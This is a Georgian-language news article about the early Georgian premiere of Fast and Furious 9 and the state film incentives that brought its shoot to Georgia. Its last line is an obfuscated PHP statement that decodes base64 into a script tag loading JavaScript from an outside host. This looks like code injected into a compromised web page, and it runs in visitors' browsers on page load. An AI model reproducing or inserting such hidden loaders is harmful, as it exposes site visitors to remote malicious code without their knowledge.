celsiusi
ავერსი შნაიდერი
19 მაისიდან საქართველოს კინოთეატრებში, ამერიკულ პრემიერამდე ერთი თვით ადრე ფილმის „ფორსაჟი 9" პრემიერა გაიმართება.
 
როგორც „ინტერპრესნიუსს" „კავეას" კინოთეატრების ქსელის საზოგადოებასთან ურთიერთობის სამსახურიდან აცნობეს, ფილმის ნახვა დიდ ეკრანებზე საღამოს სეანსებზეც იქნება შესაძლებელი.
 
მათივე ცნობით, „კომენდანტის საათის“ გადაწევის გამო, კინოთეატრებს საღამოს სეანსების დამატების შესაძლებლობა მიეცა.
 
ბილეთების გაყიდვა კინოთეატრებში უკვე დაიწყო.
 
„UNIVERSAL PICTURES-ის ბლოკბასტერის, Fast and Furious 9 სააგენტოს „აწარმოე საქართველოში“ ერთ-ერთი უმთავრესი მიზანი იყო ჰოლივუდის საქართველოში შემოყვანა.
 
სწორედ პროგრამა „გადაიღე საქართველოში“ და ჩვენს ქვეყანაში არსებული მოქნილი cash back სისტემა გახდა პროექტის საქართველოში განხორციელების ძირითადი მიზეზი. მთავრობის და სხვადასხვა საჯარო უწყებების მხრიდან არსებულ მხარდაჭერაზე, ვრცლად ისაუბრეს ამერიკული კომპანიის წარმომადგენლებმა და ფილმის რეჟისორმა ჯასტინ ლინმა. მათი თქმით, ფილმის კულმინაციური ნაწილის საქართველოში გადაღება სწორედ სხვადასხვა სამთავრობო უწყების, განსაკუთრებით სააგენტოს „აწარმოე საქართველოში“ მხარდაჭერით გახდა შესაძლებელი.
 
კომპანია "ენკენი ფილმსი” 2 წლის განმავლობაში ანხორციელებდა მოლაპარაკებებს უნივერსალ სტუდიოსთან და ეს არის პირველი ჰოლივუდური დიდი, სტუდიური ფილმი არა მარტო საქართველოში არამედ მთელ რეგიონში, რომელიც "ენკენი ფილმსმა" და "იუნივერსალ სტუდიომ" ერთად განახორცირლეს. სწორედ "უნივერსალ სტუდიოს" წარმომადგენლები საუბრობენ, რომ ეს იყო ამ წლის ტექნიკურად ყველაზე რთული ფილმის, ყველაზე რთულად გადასაღები მონაკვეთი, რასაც ქართულმა გუნდმა მაღალ დონეზე გაართვა თავი. ამ პროექტის წარმატებით განხორციელებამ ქვეყნის მიმართ ინტერესი გაზარდა და ამ ეტაპზე უკვე მიდის 3 ჰოლივუდურ ფილმზე მოლაპარაკებები. პროექტში 4000-მდე ადამიანი დასაქმდა, რასაც უდიდესი მნიშვნელობა აქვს უშუალოდ დარგის და ქვეყნის ეკონომიკის განვითარებაზე", - აღნიშნულია ინფორმაციაში.
1336
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");